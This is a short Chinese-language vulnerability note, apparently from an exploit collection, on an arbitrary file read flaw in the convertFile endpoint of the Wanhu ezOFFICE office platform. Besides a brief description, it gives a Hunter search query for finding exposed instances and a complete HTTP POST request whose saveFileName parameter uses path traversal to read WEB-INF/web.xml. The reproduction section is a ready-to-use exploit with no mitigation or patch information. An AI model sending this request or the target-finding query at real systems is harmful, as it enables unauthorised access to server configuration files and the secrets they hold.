万户协同办公平台 ezoffice convertFile存在任意文件读取漏洞
一、漏洞简介
万户ezOFFICE协同管理平台是一个综合信息基础应用平台。 万户协同办公平台 ezoffice convertFile存在任意文件读取漏洞,攻击者可通过该漏洞获取敏感信息。
二、影响版本
- 万户ezoffice
三、资产测绘
- hunter
app.name="万户 Ezoffice OA" - 登录页面
四、漏洞复现
POST /defaultroot/convertFile/text2Html.controller HTTP/1.1
Host: {hostname}
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15
Content-Length: 63
Content-Type: application/x-www-form-urlencoded
Accept-Encoding: gzip, deflate
Connection: close
saveFileName=123456/../../../../WEB-INF/web.xml&moduleName=html